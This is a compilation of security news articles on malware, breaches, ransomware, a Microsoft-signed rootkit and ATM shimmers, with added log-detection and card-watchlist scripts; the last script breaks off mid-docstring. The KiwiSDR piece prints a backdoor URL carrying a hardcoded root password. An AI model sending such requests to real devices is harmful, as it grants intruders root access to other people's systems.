  1. Security researchers have published details about the method used by a strain of macOS malware to steal login information from multiple apps, enabling its operators to steal accounts. Dubbed XCSSET, the malware keeps evolving and has been targeting macOS developers for more than a year by infecting local Xcode projects.

Stealing Telegram accounts, Chrome passwords

XCSSET collects from infected computers files with sensitive information belonging to certain applications and sends them to the command and control (C2) server. One of the targeted apps is Telegram instant messaging software. The malware creates the archive “telegram.applescript” for the “keepcoder.Telegram” folder under the Group Containers directory. Collecting the Telegram folder allows the hackers to log into the messaging app as the legitimate owner of the account.

Researchers at Trend Micro explain that copying the stolen folder on another machine with Telegram installed gives the attackers access to the victim’s account. XCSSET can steal sensitive data this way because normal users can access the Application sandbox directory with read and write permissions.

“Not all executable files are sandboxed on macOS, which means a simple script can steal all the data stored in the sandbox directory” - Trend Micro

The researchers also analyzed the method used to steal the passwords saved in Google Chrome, a technique that requires user interaction and has been described since at least 2016. The threat actor needs to get the Safe Storage Key, which is stored in the user’s keychain as “Chrome Safe Storage.” However, they use a fake dialog to trick the user into giving administrator privileges to all of the attacker’s operations necessary to get the Safe Storage Key that can decrypt passwords stored in Chrome. Once decrypted, all the data is sent to the attacker’s command and control server.

Similar scripts exist in XCSSET for stealing sensitive data from other apps: Contacts, Evernote, Notes, Opera, Skype, WeChat. Trend Micro researchers say that the latest version of XCSSET they analyzed also has an updated list of C2 servers and a new “canary” module for cross-site scripting (XSS) injections in the experimental Chrome Canary web browser.

While the recent updates of the malware are far from adding significant features, they show that XCSSET is evolving and adapting continuously. XCSSET is targeting the latest macOS version (currently Big Sur) and has in the past been seen leveraging a zero-day vulnerability to circumvent protections for full disk access and avoid explicit consent from the user.
__________________
  2. Attackers have stolen 1 TB of proprietary data belonging to Saudi Aramco and are offering it for sale on the darknet. The Saudi Arabian Oil Company, better known as Saudi Aramco, is one of the largest public petroleum and natural gas companies in the world. The oil giant employs over 66,000 employees and brings in almost $230 billion in annual revenue.

The threat actors are offering Saudi Aramco's data starting at a negotiable price of $5 million. Saudi Aramco has pinned this data incident on third-party contractors and tells BleepingComputer that the incident had no impact on Aramco's operations.

"Zero-day exploitation" used to breach network

This month, a threat actor group known as ZeroX is offering 1 TB of proprietary data belonging to Saudi Aramco for sale. ZeroX claims the data was stolen by hacking Aramco's "network and its servers," sometime in 2020. As such, the files in the dump are as recent as 2020, with some dating back to 1993, according to the group.

When asked by BleepingComputer as to what method was used to gain access to the systems, the group did not explicitly spell out the vulnerability but instead called it "zero-day exploitation."

To create traction among prospective buyers, a small sample set of Aramco's blueprints and proprietary documents with redacted PII were first posted on a data breach marketplace forum in June this year:

[Image: Forum post with a link to the dark web leak site (BleepingComputer)]

However, at the time of initial posting, the .onion leak site had a countdown timer set to 662 hours, or about 28 days, after which the sale and negotiations would begin.

ZeroX told BleepingComputer that the choice of "662 hours" was intentional and a "puzzle" for Saudi Aramco to solve, but the exact reason behind the choice remains unclear:

[Image: Threat actors announced data would be up for sale after 662 hours (BleepingComputer)]

The group says that the 1 TB dump includes documents pertaining to Saudi Aramco's refineries located in multiple Saudi Arabian cities, including Yanbu, Jazan, Jeddah, Ras Tanura, Riyadh, and Dhahran. And, that some of this data includes:

  • Full information on 14,254 employees: name, photo, passport copy, email, phone number, residence permit (Iqama card) number, job title, ID numbers, family information, etc.
  • Project specification for systems related to/including electrical/power, architectural, engineering, civil, construction management, environmental, machinery, vessels, telecom, etc.
  • Internal analysis reports, agreements, letters, pricing sheets, etc.
  • Network layout mapping out the IP addresses, Scada points, Wi-Fi access points, IP cameras, and IoT devices.
  • Location map and precise coordinates.
  • List of Aramco's clients, along with invoices and contracts.

[Image: Samples of stolen Saudi Aramco data and blueprints shared on leak site (BleepingComputer)]

Samples released by ZeroX on the leak site have personally identifiable information (PII) redacted, and a 1 GB sample alone costs US$2,000, paid as Monero (XMR). The threat actor, however, did share a few recent unredacted documents with BleepingComputer for confirmation.

The price of the entire 1 TB dump is set at US$5 million, although the threat actors say the amount is negotiable. A party requesting an exclusive, one-off sale (i.e. obtain the complete 1 TB dump and demand it be wiped completely from ZeroX's end) is expected to pay a whopping US$50 million.

ZeroX shared with BleepingComputer that up until this point, they have been negotiating the sale with five buyers.

Not a ransomware or extortion incident

Contrary to some claims floating around on the internet [1, 2] labeling this incident a "ransomware attack," it is not. Both the threat actor and Saudi Aramco have confirmed to BleepingComputer that this is not a ransomware incident.

Saudi Aramco told BleepingComputer that the data breach occurred at third-party contractors, rather than direct exploitation of Aramco's systems:

"Aramco recently became aware of the indirect release of a limited amount of company data which was held by third party contractors."

"We confirm that the release of data has no impact on our operations, and the company continues to maintain a robust cybersecurity posture," an Aramco spokesperson told BleepingComputer.

Mysteriously enough, the threat actors did not even inform Saudi Aramco of the stolen data, or attempt extortion after gaining access to their networks, which further casts doubts on the purpose of the timer shown above. It seems the countdown timer was merely set up as a lure for prospective buyers, to generate an initial buzz around the sale.

In 2012, a prominent data breach against Saudi Aramco's systems wiped over 30,000 computer hard drives clean. The cyberwarfare incident conducted via the Shamoon virus was allegedly linked to Iran.

In more recent times, attacks on mission-critical infrastructure like the Colonial Pipeline and the largest U.S. propane provider, AmeriGas, have prompted a need for stepping up cybersecurity efforts at these facilities.
__________________
  3. Moldova's "Court of Accounts" has suffered a cyberattack leading to the agency's public databases and audits being destroyed. Court of Accounts of Moldova is a government authority that performs audits of public financial resources and government agencies to comply with international standards.

Yesterday, Moldova's state news agency Moldpres reported on behalf of the Court of Accounts that their website was hacked, and threat actors destroyed audit reports and other public data.

“It is for the first time when the supreme audit institution faces such a situation. The destruction of the public page took place in the context of important audits and with impact in the society, at the stage of reporting and making public of the most significant audit missions planned in the institution’s work,” the Court of Accounts said.

The attack has led the agency to shut down its website while the incident is investigated and data can be restored.

[Image: Website for Court of Accounts]

The agency states that they are investigating whether the attack was arbitrary, done for extortion, or to disrupt their work.

"The needed investigations will identify whether the attack has been organized by hackers arbitrarily, on purposes of blackmailing, or it is about a planned order, in order to create impediments to the work of the country’s supreme audit institution," said the Court of Accounts.

While this cyberattack was destructive for the Court of Accounts, the threat actors could have caused further damage by using the site to distribute malware to visitors.

Last week, researchers from T&T Security disclosed that the Kazakhstan government's 'Open Budgets' website used by government agencies and local government branches to publish budget reports was hacked to distribute malicious office documents that installed malware.
__________________
  4. The author of a popular software-defined radio (SDR) project has removed a "backdoor" from radio devices that granted root-level access. The backdoor had been, according to the author, present in all versions of KiwiSDR devices for the purposes of remote administration and debugging.

Last night, the author pushed out a "bug fix" on the project's GitHub aimed at removing this backdoor silently, which sparked some backlash. Since then, the author's original forum posts and comments with any mention of "backdoor" have been removed over the last few hours.

Hardcoded password gives root access to all devices

KiwiSDR is a software-defined radio that can be attached to an embedded computer, like Seeed BeagleBone Green (BBG). It is provided either as a standalone board or a more complete version featuring BBG, a GPS antenna, and an enclosure.

[Image: KiwiSDR user interface with different RF controls]

SDRs are aimed at replacing radio frequency (RF) communication hardware with software or firmware for carrying out signal processing activities that would normally require hardware devices. The concept is analogous to software-defined networking.

Yesterday, Mark Jessop, an RF engineer and radio operator, came across an interesting forum post in which the author of the KiwiSDR project admitted to having remote access to all radio receiver devices running the software.

Another user, M., dug out a 2017 forum thread where KiwiSDR's developer admitted that a backdoor indeed provided them with remote access to all KiwiSDR devices.

Although the entire KiwiSDR forum site has become inaccessible as of today, an archived copy of the forum post seen by BleepingComputer confirms the contents of the tweet:

[Image: KiwiSDR software author stated there's a backdoor in all devices giving them remote access]

Furthermore, as of today, over 600 KiwiSDR devices are online with the backdoor still present in them, as highlighted by Hacker Fantastic.

Although these devices are mainly acting as radio receivers, it is worth noting that any remote actor who logs in using the hardcoded master password is granted root-level access to the device's (Linux-based) console. This can enable adversaries to probe into the IoT devices, take them over, and begin traversing adjacent networks the radio devices are connected to:

"These KiwiSDRs are used for receiving HF radio stations. The backdoor itself doesn't give an attacker any special SDR access, just that they can access the console of the device (Linux) and start pivoting into networks," ethical hacker xssfox told BleepingComputer.

An image of the KiwiSDR administration panel obtained by BleepingComputer shows console-level access with root access (notice the #) is possible:

[Image: KiwiSDR remote admin panel provides root access to the device console]

A video created by xssfox demonstrates how the backdoor can be exploited via a simple HTTP GET request, which looks like:

Code:
http://radio-device-domain.example.com:8074/admin?su=kconbyp

Note: the superuser password (kconbyp) shown above is an older password, the SHA256 hash of which used to be present on KiwiSDR devices. The more recent hash (shown below) is different, indicating "kconbyp" won't work on later versions of KiwiSDR and that a newer master password has been present.

Dev pushes out "bug fix" overnight removing the backdoor

As seen by BleepingComputer, as of a few hours ago a fix has been committed to KiwiSDR's GitHub project removing the backdoor code. The update removes multiple administrative functions, and specifically the code that compares the provided master password against its SHA256 hash:

[Image: KiwiSDR author removes hardcoded password from devices (GitHub)]

Jessop clarified that there is no indication of KiwiSDR's author having misused the backdoor access, which had been introduced with the intention of debugging KiwiSDR devices in good faith.

He further said the KiwiSDR developer has been extremely responsive in patching bugs and adding features. But, like others, the engineer did express concerns that the master password would transmit over HTTP, enabling any Man-in-the-Middle (MitM) threat actor to potentially intercept it and consequently gain remote access to all devices.

Some Redditors also expressed that backdoors were never okay, regardless of whether HTTPS was in use:

"No way. Back doors are never okay. Password was sent in the clear, as HTTPS isn't supported. Eventually someone would have exploited this. Hell, someone might have already exploited this and we just don't know about it," said one of the users in a thread.

KiwiSDR users should upgrade to the latest version v1.461 released today on GitHub that removes the backdoor from their radio devices.
__________________
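As an added example (not from the article, the KiwiSDR project, or the researchers quoted above), the following Python script checks web-server access logs for requests shaped like the backdoor URL quoted in the post (a request to /admin carrying an su parameter) and reports the probing sources. It assumes the device sits behind a reverse proxy that writes Apache/nginx combined-style log lines, which is an assumption since the article does not describe KiwiSDR's own logging; the sample lines are constructed.

```python
"""Flag access-log requests matching the KiwiSDR master-password URL pattern
(GET /admin?su=<password>) and summarise which clients sent them.

Assumptions (not from the article): the receiver is fronted by a proxy that
writes Apache/nginx "combined"-style lines. The sample log below is constructed.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Combined-format prefix: client IP, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample: two backdoor-style requests from one source, one from
# another, plus ordinary traffic to the admin page (no su parameter) and the UI.
SAMPLE_LOG = """\
203.0.113.9 - - [05/Jul/2021:10:01:12 +0000] "GET /admin?su=REDACTED-PASSWORD HTTP/1.1" 200 1422 "-" "curl/7.68.0"
198.51.100.7 - - [05/Jul/2021:10:01:40 +0000] "GET /admin HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Jul/2021:10:02:03 +0000] "GET /admin/?su= HTTP/1.1" 403 512 "-" "curl/7.68.0"
192.0.2.44 - - [05/Jul/2021:10:05:55 +0000] "GET /?f=7020 HTTP/1.1" 200 30211 "-" "Mozilla/5.0"
192.0.2.44 - - [05/Jul/2021:10:06:10 +0000] "POST /admin?su=x HTTP/1.1" 200 90 "-" "python-requests/2.25"
"""


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep_blank_values: an empty "su=" is still a probe of the parameter.
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def is_su_request(rec):
    """True when the request targets the admin page with an 'su' parameter, any method."""
    if rec is None:
        return False
    return rec["path"].rstrip("/") == "/admin" and "su" in rec["query"]


def scan(log_text):
    """Return one finding per matching line.

    The supplied password value is never copied into the finding, only its
    length: the article notes it travels over plain HTTP, so the raw log line
    already holds it and the report should not spread it further.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if is_su_request(rec):
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "method": rec["method"],
                "status": rec["status"],
                "su_len": len(rec["query"]["su"][0]),
            })
    return findings


def sources(findings):
    """Count findings per client IP, for a quick view of who is probing."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]} {h["method"]} /admin?su=<{h["su_len"]} chars> -> {h["status"]}')
    print("per-source:", dict(sources(hits)))
```

A 200 response to such a request on a device still below v1.461 is the case worth escalating; a 403 or a request against a patched device only shows that someone is probing.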
  5. Kaseya has warned customers that an ongoing phishing campaign attempts to breach their networks by spamming emails bundling malicious attachments and embedded links posing as legitimate VSA security updates.

"Spammers are using the news about the Kaseya Incident to send out fake email notifications that appear to be Kaseya updates. These are phishing emails that may contain malicious links and/or attachments," the company said in an alert issued on Thursday evening.

"Do not click on any links or download any attachments claiming to be a Kaseya advisory. Moving forward, Kaseya email updates will not contain any links or attachments."

Attackers try to backdoor recipients' systems

While the company did not provide additional details regarding these attacks, the warning perfectly lines up with another series of malspam emails targeting Kaseya customers with Cobalt Strike payloads.

As BleepingComputer first reported, Malwarebytes Threat Intelligence researchers have recently discovered a series of phishing attacks trying to take advantage of the ongoing Kaseya ransomware crisis.

"A malspam campaign is taking advantage of Kaseya VSA ransomware attack to drop CobaltStrike," Malwarebytes researchers said. "It contains an attachment named 'SecurityUpdates.exe' as well as a link pretending to be security update from Microsoft to patch Kaseya vulnerability!"

[Image: Kaseya phishing email sample (Malwarebytes)]

The attackers' end goal is to deploy Cobalt Strike beacons on the recipients' devices to backdoor them and steal sensitive info or deliver more malware payloads. Once the targets run the malicious attachment or download and execute the fake Microsoft update on their devices, the attackers gain persistent remote access to the now compromised systems.

In June, following the Colonial Pipeline attack, threat actors also used fake system updates claiming to help block ransomware infections.

These two campaigns highlight that cybercriminals behind phishing attacks keep up with the latest news to push lures relevant to recent events to boost their campaigns' success rates.

Given that Kaseya has so far failed to deploy a fix for the VSA zero-day exploited by REvil, some of its customers might fall for this campaign's tricks in their effort to protect their networks from attacks.

Light at the end of the tunnel

The highly publicized REvil ransomware attack that hit Kaseya and approximately 1,500 of their direct customers and downstream businesses makes for a perfect lure theme.

After the attack was disclosed, CISA and the FBI have shared guidance on how to deal with the attack's aftermath, and the White House National Security Council is urging victims to follow the guidance issued by Kaseya and report incidents to the FBI.

However, despite the attack's massive reach, which has led to some calling it the largest ransomware attack ever, multiple victims told BleepingComputer that their backups were not affected, and they are restoring systems rather than paying a ransom.

Victims who do ultimately pay REvil's ransoms will likely only do so because their backups failed or they had no backups to begin with.
__________________
  6. The REvil ransomware gang is increasing the ransom demands for victims encrypted during Friday's Kaseya ransomware attack.

When conducting an attack against a business, ransomware gangs, such as REvil, typically research a victim by analyzing stolen and public data for financial information, cybersecurity insurance policies, and other information. Using this information, the number of encrypted devices, and the amount of stolen data, the threat actors will come up with a high-ball ransom demand that they believe, after negotiations, the victim can afford to pay.

However, with Friday's attack on Kaseya VSA servers, REvil targeted the managed service providers and not their customers. Due to this, the threat actors could not determine how much of a ransom they should demand from the encrypted MSP customers.

As a solution, it seems the ransomware gang created a base ransom demand of $5 million for MSPs and a much smaller ransom of $44,999 for the MSP's customers who were encrypted.

[Image: Ransom demand for Kaseya ransomware victims]

It turns out this $44 thousand number is irrelevant, as in numerous negotiation chats shared with and seen by BleepingComputer, the ransomware gang is not honoring these initial ransom demands.

When encrypting a victim's network, REvil can use multiple encrypted file extensions during the attack. The threat actors typically provide a decryptor that can decrypt all extensions on the network after a ransom is paid.

For victims of the Kaseya ransomware incident, REvil is doing things differently and demanding between $40,000 and $45,000 per individual encrypted file extension found on a victim's network.

[Image: A portion of REvil ransom negotiation]

For one victim who stated they had over a dozen encrypted file extensions, the ransomware gang demanded a $500,000 ransom to decrypt the entire network.

[Image: $500,000 ransom to decrypt the entire network]

However, the good news is that the REvil representatives have told victims that they only encrypted networks, and nothing more. This means that REvil likely did not steal any of the victims' data, as they are known to use that as leverage in ransomware negotiations immediately.

[Image: REvil indicates data was not stolen]

This also indicates that the ransomware operation did not access the victim's networks before the attack. Instead, they likely remotely exploited the Kaseya VSA vulnerability to distribute the encryptor and execute it on the victim's devices.

Attack's aftermath

Since the attacks on Friday, Kaseya has been working on releasing a patch for the zero-day vulnerability exploited in the REvil attack. This zero-day was discovered by DIVD researchers, who disclosed it to Kaseya and are helping test the patch.

Unfortunately, REvil found the vulnerability simultaneously and launched their attack on Friday before the patch was ready, just in time for the US Fourth of July holiday weekend.

It is believed that over 1,000 businesses have been affected by the attack, including attacks on the Swedish Coop supermarket chain, which had to close approximately 500 stores, a Swedish pharmacy chain, and the SJ transit system.

President Biden has directed US intelligence agencies to investigate the attack but has not gone as far as to state that the attacks originated from Russia.

The FBI also announced today that they are investigating the incident and working closely with CISA and other agencies.

"The FBI is investigating the Kaseya ransomware incident and working closely with CISA and other interagency partners to understand the scope of the threat."

"If you believe your systems have been compromised, we encourage you to employ all recommended mitigations, follow Kaseya's guidance to shut down your VSA servers immediately and report to the FBI at ic3.gov," said the FBI in a press statement.
__________________
  7. Dutch cybersecurity firm Tesorion has released a free decryptor for the Lorenz ransomware, allowing victims to recover some of their files for free without paying a ransom.

Lorenz is a human-operated ransomware that began operating in April 2021 and has since listed twelve victims whose data they have stolen and leaked on their ransomware data leak site.

[Image: Lorenz ransomware data leak site]

Lorenz is not particularly active and has begun to taper off in recent months compared to other operations.

Lorenz ransomware decryptor released

The Lorenz ransomware decryption tool can be downloaded from NoMoreRansom and will allow victims to recover some of their encrypted files.

Unlike other ransomware decryptors that include the actual decryption key, Tesorion's decryptor operates differently and can only decrypt certain file types.

Tesorion researcher Gijs Rijnders told BleepingComputer that only files with well-known file structures could be decrypted, such as Office documents, PDF files, some image types, and movie files.

While the decryptor will not decrypt every file type, it will still allow those who do not pay the ransom to recover important files.

As you can see below, the decryptor can decrypt well-known file types, such as XLS and XLSX files, without a problem. However, it will not decrypt unknown file types or those with uncommon file structures.

[Image: Lorenz ransomware decryptor]

In addition to providing a decryptor, Tesorion provided insight into the encryption technique used by the Lorenz ransomware.

In a blog post, Rijnders explains that a bug in how they implement their encryption can cause data to become lost, which would prevent a file from being decrypted even if a ransom was paid.

"The result of this bug is that for every file whose size is a multiple of 48 bytes, the last 48 bytes are lost. Even if you managed to obtain a decryptor from the malware authors, these bytes cannot be recovered," explains Rijnders.
__________________
  8. Microsoft has now confirmed signing a malicious driver being distributed within gaming environments. This driver, called "Netfilter," is in fact a rootkit that was observed communicating with Chinese command-and-control (C2) IPs.

G Data malware analyst Karsten Hahn first took notice of this event last week and was joined by the wider infosec community in tracing and analyzing the malicious drivers bearing the seal of Microsoft.

It turns out, the C2 infrastructure belongs to a company classified under "Communist Chinese military" by the US Department of Defense. This incident has once again exposed threats to software supply-chain security, except this time it stemmed from a weakness in Microsoft's code-signing process.

"Netfilter" driver is rootkit signed by Microsoft

Last week, G Data's cybersecurity alert systems flagged what appeared to be a false positive, but was not—a Microsoft signed driver called "Netfilter." The driver in question was seen communicating with China-based C&C IPs providing no legitimate functionality and as such raised suspicions.

This is when G Data's malware analyst Karsten Hahn shared this publicly and simultaneously contacted Microsoft:

[Image: The malicious binary has been signed by Microsoft (VirusTotal)]

"Since Windows Vista, any code that runs in kernel mode is required to be tested and signed before public release to ensure stability for the operating system."

"Drivers without a Microsoft certificate cannot be installed by default," states Hahn.

At the time, BleepingComputer began observing the behavior of C2 URLs and also contacted Microsoft for a statement. The first C2 URL returns a set of more routes (URLs) separated by the pipe ("|") symbol:

[Image: Navigating to the C2 URL presents more routes for different purposes]

Each of these serves a purpose, according to Hahn: The URL ending in "/p" is associated with proxy settings, "/s" provides encoded redirection IPs, "/h?" is for receiving CPU-ID, "/c" provided a root certificate, and "/v?" is related to the malware's self-update functionality.

As seen by BleepingComputer, for example, the "/v?" path provided the URL to the malicious Netfilter driver in question itself (living at "/d3"):

[Image: Path to malicious Netfilter driver]

The G Data researcher spent some time sufficiently analyzing the driver and concluded it to be malware. The researcher has analyzed the driver, its self-update functionality, and Indicators of Compromise (IOCs) in a detailed blog post.

"The sample has a self-update routine that sends its own MD5 hash to the server via hxxp://," says Hahn. An example request would look like this:

Code:
hxxp://

"The server then responds with the URL for the latest sample, e.g. hxxp:// or with 'OK' if the sample is up-to-date. The malware replaces its own file accordingly," further explained the researcher.

[Image: Malware's self-update functionality analyzed by G Data]

During the course of his analysis, Hahn was joined by other malware researchers including Johann Aydinbas, Takahiro Haruyama, and Florian Roth. Roth was able to gather the list of samples in a spreadsheet and has provided YARA rules for detecting these in your network environments.

Notably, the C2 IP that the malicious Netfilter driver connects to belonged to Ningbo Zhuo Zhi Innovation Network Technology Co., Ltd, according to WHOIS records. The U.S. Department of Defense (DoD) has previously marked this organization as a "Communist Chinese military company," another researcher @cowonaut observed.

Microsoft admits to signing the malicious driver

Microsoft is actively investigating this incident, although thus far, there is no evidence that stolen code-signing certificates were used. The mishap seems to have resulted from the threat actor following Microsoft's process to submit the malicious Netfilter drivers, and managing to acquire the Microsoft-signed binary in a legitimate manner:

"Microsoft is investigating a malicious actor distributing malicious drivers within gaming environments."

"The actor submitted drivers for certification through the Windows Hardware Compatibility Program. The drivers were built by a third party."

"We have suspended the account and reviewed their submissions for additional signs of malware," said Microsoft yesterday.

According to Microsoft, the threat actor has mainly targeted the gaming sector specifically in China with these malicious drivers, and there is no indication of enterprise environments having been affected so far. Microsoft has refrained from attributing this incident to nation-state actors just yet.

Falsely signed binaries can be abused by sophisticated threat actors to facilitate large-scale software supply-chain attacks. The multifaceted Stuxnet attack that targeted Iran's nuclear program marks a well-known incident in which code-signing certificates were stolen from Realtek and JMicron to facilitate the attack.

This particular incident, however, has exposed weaknesses in a legitimate code-signing process, exploited by threat actors to acquire Microsoft-signed code without compromising any certificates.
__________________
  9. In 2015, police departments worldwide started finding ATMs compromised with advanced new “shimming” devices made to steal data from chip card transactions. Authorities in the United States and abroad had seized many of these shimmers, but for years couldn’t decrypt the data on the devices. This is a story of ingenuity and happenstance, and how one former Secret Service agent helped crack a code that revealed the contours of a global organized crime ring. Jeffrey Dant was a special agent at the U.S. Secret Service for 12 years until 2015. After that, Dant served as the global lead for the fraud fusion center at Citi, one of the largest financial institutions in the United States. Not long after joining Citi, Dant heard from industry colleagues at a bank in Mexico who reported finding one of these shimming devices inside the card acceptance slot of a local ATM. As it happens, KrebsOnSecurity wrote about that particular shimmer back in August 2015. This card ‘shimming’ device is made to read chip-enabled cards and can be inserted directly into the ATM’s card acceptance slot. The shimmers were an innovation that caused concern on multiple levels. For starters, chip-based payment cards were supposed to be far more expensive and difficult for thieves to copy and clone. But these skimmers took advantage of weaknesses in the way many banks at the time implemented the new chip card standard. Also, unlike traditional ATM skimmers that run on hidden cell phone batteries, the ATM shimmers found in Mexico did not require any external power source, and thus could remain in operation collecting card data until the device was removed. When a chip card is inserted, a chip-capable ATM reads the data stored on the smart card by sending an electric current through the chip. Incredibly, these shimmers were able to siphon a small amount of that power (a few milliamps) to record any data transmitted by the card. 
When the ATM is no longer in use, the skimming device remains dormant, storing the stolen data in an encrypted format. Dant and other investigators looking into the shimmers didn’t know at the time how the thieves who planted the devices went about gathering the stolen data. Traditional ATM skimmers are either retrieved manually, or they are programmed to transmit the stolen data wirelessly, such as via text message or Bluetooth. But recall that these shimmers don’t have anywhere near the power needed to transmit data wirelessly, and the flexible shimmers themselves tend to rip apart when retrieved from the mouth of a compromised ATM. So how were the crooks collecting the loot? “We didn’t know how they were getting the PINs at the time, either,” Dant recalled. “We found out later they were combining the skimmers with old school cameras hidden in fake overhead and side panels on the ATMs.” Investigators wanted to look at the data stored on the shimmer, but it was encrypted. So they sent it to MasterCard’s forensics lab in the United Kingdom, and to the Secret Service. “The Secret Service didn’t have any luck with it,” Dant said. “MasterCard in the U.K. was able to understand a little bit at a high level what it was doing, and they confirmed that it was powered by the chip. But the data dump from the shimmer was just encrypted gibberish.” Organized crime gangs that specialize in deploying skimmers very often will encrypt stolen card data as a way to remove the possibility that any gang members might try to personally siphon and sell the card data in underground markets. THE DOWNLOAD CARDS Then in 2017, Dant got a lucky break: Investigators had found a shimming device inside an ATM in New York City, and that device appeared identical to the shimmers found in Mexico two years earlier. “That was the first one that had showed up in the U.S. at that point,” Dant said. 
The Citi team suspected that if they could work backwards from the card data that was known to have been recorded by the shimmers, they might be able to crack the encryption. “We knew when the shimmer went into the ATM, thanks to closed-circuit television footage,” Dant said. “And we know when that shimmer was discovered. So between that time period of a couple of days, these are the cards that interacted with the skimmer, and so these card numbers are most likely on this device.” Based on that hunch, MasterCard’s eggheads had success decoding the encrypted gibberish. But they already knew which payment cards had been compromised, so what did investigators stand to gain from breaking the encryption? According to Dant, this is where things got interesting: They found that the same primary account number (the unique 16 digits of the card) was present on the download card and on the shimmers from both the New York City and Mexican ATMs. Further research revealed that account number was tied to a payment card issued years prior by an Austrian bank to a customer who reported never receiving the card in the mail. “So why is this Austrian bank card number on the download card and two different shimming devices in two different countries, years apart?” Dant said he wondered at the time. He didn’t have to wait long for an answer. Soon enough, the NYPD brought a case against a group of Romanian men suspected of planting the same shimming devices in both the U.S. and Mexico. Search warrants served against the Romanian defendants turned up multiple copies of the shimmer they’d seized from the compromised ATMs. “They found an entire ATM skimming lab that had different versions of that shimmer in untrimmed squares of sheet metal,” Dant said. “But what stood out the most was this unique device — the download card.”
The download card (right, in blue) opens an encrypted session with the shimmer, and then transmits the stolen card data to the attached white plastic device. Image: KrebsOnSecurity.com.
The download card consisted of two pieces of plastic about the width of a debit card but a bit longer. The blue plastic part — made to be inserted into a card reader — features the same contacts as a chip card. The blue plastic was attached via a ribbon cable to a white plastic card with a green LED and other electronic components. Sticking the blue download card into a chip reader revealed the same Austrian card number seen on the shimming devices. It then became very clear what was happening. “The download card was hard coded with chip card data on it, so that it could open up an encrypted session with the shimmer,” which also had the same card data, Dant said.
The download card, up close. Image: KrebsOnSecurity.com.
Once inserted into the mouth of an ATM card acceptance slot that’s already been retrofitted with one of these shimmers, the download card causes an encrypted data exchange between it and the shimmer. Once that two-way handshake is confirmed, the white device lights up a green LED when the data transfer is complete.
THE MASTER KEY
Dant said when the Romanian crew mass-produced their shimming devices, they did so using the same stolen Austrian bank card number. What this meant was that now the Secret Service and Citi had a master key to discover the same shimming devices installed in other ATMs. That’s because every time the gang compromised a new ATM, that Austrian account number would traverse the global payment card networks — telling them exactly which ATM had just been hacked. “We gave that number to the card networks, and they were able to see all the places that card had been used on their networks before,” Dant said.
“We also set things up so we got alerts anytime that card number popped up, and we started getting tons of alerts and finding these shimmers all over the world.” For all their sleuthing, Dant and his colleagues never really saw shimming take off in the United States, at least nowhere near as prevalently as in Mexico, he said. The problem was that many banks in Mexico and other parts of Latin America had not properly implemented the chip card standard, which meant thieves could use shimmed chip card data to make the equivalent of old magnetic stripe-based card transactions. By the time the Romanian gang’s shimmers started showing up in New York City, the vast majority of U.S. banks had already properly implemented chip card processing in such a way that the same phony chip card transactions which sailed through Mexican banks would simply fail every time they were tried against U.S. institutions. “It never took off in the U.S., but this kind of activity went on like wildfire for years in Mexico,” Dant said. The other reason shimming never emerged as a major threat for U.S. financial institutions is that many ATMs have been upgraded over the past decade so that their card acceptance slots are far slimmer, Dant observed. “That download card is thicker than a lot of debit cards, so a number of institutions were quick to replace the older card slots with newer hardware that reduced the height of a card slot so that you could maybe get a shimmer and a debit card, but definitely not a shimmer and one of these download cards,” he said. Shortly after ATM shimmers started showing up at banks in Mexico, KrebsOnSecurity spent four days in Mexico tracing the activities of a Romanian organized crime gang that had very recently started its own ATM company there called Intacash. 
Sources told KrebsOnSecurity that the Romanian gang also was paying technicians from competing ATM providers to retrofit cash machines with Bluetooth-based skimmers that hooked directly up to the electronics on the inside. Hooked up to the ATM’s internal power, those skimmers could collect card data indefinitely, and the data could be collected wirelessly with a smart phone. Follow-up reporting last year by the Organized Crime and Corruption Reporting Project (OCCRP) found Intacash and its associates compromised more than 100 ATMs across Mexico using skimmers that were able to remain in place undetected for years. The OCCRP, which dubbed the Romanian group “The Riviera Maya Gang,” estimates the crime syndicate used cloned card data and stolen PINs to steal more than $1.2 billion from bank accounts of tourists visiting the region. Last month, Mexican authorities arrested Florian “The Shark” Tudor, Intacash’s boss and the reputed ringleader of the Romanian skimming syndicate. Authorities charged that Tudor’s group also specialized in human trafficking, which allowed them to send gang members to compromise ATMs across the border in the United States. __________________
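An added example, not code from the KrebsOnSecurity article, Citi or the card networks: the "master key" step above is, operationally, a watchlist rule, alert whenever the Austrian card number hard-coded into the download cards is presented, and list the terminals at which it appeared. The Python below runs that rule over constructed authorization records. The PANs, terminal IDs, timestamps, record layout and HMAC key are all assumptions made for the example; the watchlist holds a keyed hash of the PAN rather than the PAN itself, and a Luhn check keeps malformed data out of it.

```python
"""Watchlist alerting on a known indicator PAN.

Added example, not code from the KrebsOnSecurity article, Citi or the card
networks. It models the step described in the post: alert every time the
Austrian card number hard-coded into the gang's download cards shows up, and
list the terminals where it was used. The PANs, terminal IDs, timestamps,
record layout and HMAC key are all constructed for this example.
"""
import hashlib
import hmac
from collections import defaultdict

# Hypothetical key held by the fraud team; only keyed hashes of PANs are stored.
WATCHLIST_KEY = b"example-only-not-a-real-key"


def luhn_ok(pan):
    """Luhn check so malformed or test data never lands in the watchlist."""
    if not pan.isdigit() or len(pan) < 12:
        return False
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def pan_token(pan):
    """HMAC-SHA256 of the PAN: comparable, but not reversible without the key."""
    return hmac.new(WATCHLIST_KEY, pan.encode(), hashlib.sha256).hexdigest()


def find_compromised_terminals(records, watchlist_pans):
    """Map terminal ID -> timestamps at which any watchlisted PAN was presented.

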